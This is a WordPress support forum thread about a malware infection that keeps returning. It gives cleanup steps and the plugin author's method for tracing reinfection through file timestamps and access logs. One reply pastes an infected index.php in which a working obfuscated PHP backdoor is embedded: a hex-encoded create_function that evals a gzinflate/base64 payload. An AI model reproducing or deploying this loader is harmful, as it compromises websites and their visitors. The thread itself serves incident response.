Malware cleaned but came back

visit https://wprepublic.com/security/how-to-trace-and-clean-the-monit-php-hack/ for a useful method.

login to your wordpress mysql database, go to wp_options and delete:
ad_code
hide_admin
hide_logged_in
display_ad
search_engines
auto_update
ip_admin
cookies_admin
logged_admin
log_install

after deleting these options from the wp_options table, login to your ftp (or sftp) and delete admins_ip.txt from the wp-content/plugins folder

good luck

• This reply was modified 3 years, 3 months ago by frankytee.

The problem is not cleaning out the hack, my plugin will do that automatically. The problem is that you keep getting reinfected with the same malicious code. There is clearly still some vulnerable exploit on your server that is letting hackers reinfect these same files over and over again.

The best way to find and fix this security whole is to stat the infected files before you clean them to get the exact time of the infect. If you have already cleaned this infection at least once then there will be a record of the infection times in your Anti-Malware Quarantine page in your wp-admin. Once you have the exact time that any of these infections took place then you can simply cross-reference that exact time in the raw access_log files on your server. This will tell you what scripts or URLs were called to infect those files, and that will point you to plugin or theme file that is vulnerable to this exploit.

Then upgrade or remove the vulnerable plugin or theme and notify the developer.

Hi I have the same problem. I follow your advice but my site is still reinfected.

/wp-includes/js/codemirror/fxtiqfnh.php this is the path I find in the log.

Yesterday I find another URL that contain a name of plugins and I deleted it, but today same problem./wp-content/plugins/nextend-facebook-connect/includes/csqygqcf.php

Should I remove even the record from ddb as suggested by frankytee?

• This reply was modified 3 years, 2 months ago by fedeanimation.

You can remove those db entries but that will not stop your repeated infections from coming back. As I said, you need to track down the script that is responsible for this exploit, and the best way to do that is by analyzing the logged activity at the exact time of the infection, as outlined above.

Your description is missing some steps, can you elaborate:
1. wp-content/plugins/nextend-facebook-connect/includes/csqygqcf.php is infected.
2. stat wp-content/plugins/nextend-facebook-connect/includes/csqygqcf.php
3. find the activity in the log corresponding to the time returned by stat.
4. activity was a call to wp-includes/js/codemirror/fxtiqfnh.php
5. stat wp-includes/js/codemirror/fxtiqfnh.php … when was it last modified?
6. find the activity in the log corresponding to the time it was last modified.
7. What was used to write to wp-includes/js/codemirror/fxtiqfnh.php???

so-on and so-forth…

Note: If your site is on a shared hosting platform then you may need to be checking the log file for the other sites as well because infection from one site can frequently be call upon to infect the other sites on the same server.

When you have a complete trail to all infection then you can remove the infection and watch those files to make sure that the infection don’t come back. If they do then you have missed something in that trail you followed and you can do it again and make sure you get them all. New modified times, new log entries, look for the same files AND any other files in the logs that you may have missed the first time.

Note: You trail will usually end with a file that was modified so long ago that there are now long for that time or else on a file that you can explain where it came from and did not realize that it was infected when you installed it.

Also note that my plugin should be able to find and fix all these infections for you automatically, and if there are any files that you find to in your trail that were not identified as a threat by my plugin in the Complete Scan then please email those files directly to me so that I can add them to my definition updates and they can then be automatically removed with the rest.

eli AT gotmls DOT net

Hi Eli
I am also facing the similar issue. Infected file in my case is index.php
As suggested I am sending the file to your above mentioned email.
Thanks in anticipation
FYI (it looks like this)

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */$oO0="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$o0O=@$oO0('$x',"\x65\x76\x61\x6c\x28\x22\x3f\x3e\x22\x2e\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x78\x29\x29\x29\x3b");@$o0O("zVdtc9o4EP6czOQ/qB4mtucAYyCQNk3bDEOSTijp8XKZTtPxuLIMamzLtUQDR/PfbyXbxM6RNr27D5fB2Fk9z2r32bUkXr6O5/HeLo2ow4kw9JCELFk5AQ2p0KtIr9m6ebS3++Ye4C4dsiR4ISiLHEFDArCGwsC4MqRsQxlJkrDESUjMEkGjWWq89+ZRHgfuylEwnnuivnFDVkbFOetPzONj3f+MA0o93VyTb24A9lH/92l/PPmoh+2Lw8XBxNc/mUceJUd3e7uVhHx1YlfM0TEaTgcD5Q8ZlMsJK864P/qjP/qoZS6c6eit9sk013u7O0XmI0BwJqfALp6THKpZcxaSluXN55jRyIoXnwOKnbkIA+ubG7lfXJbM3Ihibt3GNRrhYOERbn3hFiiyCjGx4mAxoxG3MAvBZ2tpYc4tDeaqcMESckFWcpqWjX3/8Hm343ndQ9932y7ptNxux8a222pinBIIA7VdLyRA0cWchITXEuHXQhrVwa2egyBEEvEiqoBQJYgTMnNCV+C5oVkzxmYBsZt1lRbVqhux5BM3zb1dKSHBc4a0FFzjVJDaN5JQn2JXtssLVHIjA94hSypSVTe6+jSQcRVVroPKGnwX8pOJRIR4PYkCuO8GnGTFfiZdQJtSLrhR8JqHWQl8yWAxiYzyNLqVdmzAZtCN2u1vmmzIHf82gWQM4IERZTYcMK5s6t9SMCJZkKxXInYLBs8Fuv6hFtY8dP6CvoBel6+KYUpuJZTPOUoroLSqDFsNl/OQLGn1qC9T4SIRLEXBfCaqFS2Krhieu+KAppFQ71HuwDrstBvZm4eMQiLfvyPFeWVvhKPRTY9FgkQCHM2IGMGCIQiYjE2zKjmkJ4ghkAoXSOarY+lrRzqTZXBwXr4txfhbzQsVKZQk9VFFpXlSzKZEKUZZ71R0xiMtgky0v4/eqFFIz8Gpv3IboWfw2uiFPEqq/IScx0CgXx/xoOsZCD4pbP3/D/oHzfCzbkj9/bt+eFJDbO8Ildl/J+8mm18VOI0jk3i7l7QzFDBtD4h6i7DIfNk074vEf7qmZtvBEdqmRMHFo0rcY/6REgV6niB8RLJaqy2l6OHoDstNCRn9JSax3FdQhZhrtYP4iwgrS7kZ4TRRXMCmSSA31Otl5/B62W1nV+N62XKvl00/vbrd+6tJ0rvEd+wU33kO9xbcPbg/z8YO4MLZ5ae8Tit9lrimb8FxS4Zgya9G09LqMri6VhdLoSn1nygW5JCts4/U397fz9XIC6njRRI4cPgSujrxIPUHIuePG5v6qyw4SRx3lgaivWN/0iBwrYN6AxlXNPLYLUfDCerU7SN0dXnVaZvoJI4DckU+X1BhHbS69VYHGRfnk3eDKgroDUFnBN8wE/XmCRyZrEO73qg3Ow27btstNHZ9N6EZTZ4NiqGURNEejmJ5DtskZ5gPhuU+xxYyiVajPKQ4cDBkMZwN8bzam44Gl+/lYW9Q3bSK+SgHKRLKWePxwIEz49vTD+eX40l2mP1F5vt+f/RDZinOUX8yHQ0no5Ph+BR49hNpvcvhsN+bTN6+619OJ9VcoCeyp3A0PjnrD4F43yEPNS93sXIlfzYYsljb5knXZVXKwvDd5mnbO78ZXCuc+sp2GhozXnojqnq70UZDJtApW0TwW0JuPQ/DhMbakU4SIhZJVF511IL0+tVf");

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

@manujks,
You did not understand my suggestion then because I ask users to send me the infected files only if the it was not detected by my plugin and this infection is already in my definition updates so it can already be removed automatically by running the Complete Scan and clicking the Automatic Fix button.

However, if this infection keeps coming back every time you remove it then you need to follow steps 1 through 7 outlined in my last post. That simple process will uncover the source of this infection and if the threats you find are not already detected by my plugin then that is what you should send me.

If you are unable to state the infected file because it was delete or the stat shows only the date that you removed the infection because it was already fixed then it is possible to get the origin infection times from the Anti-Malware Quarantine page in your wp-admin if you used my plugin to fix those infected files. Use those infection times to cross-reference with your access_log files to see what scripts were were called to write the infections to those files.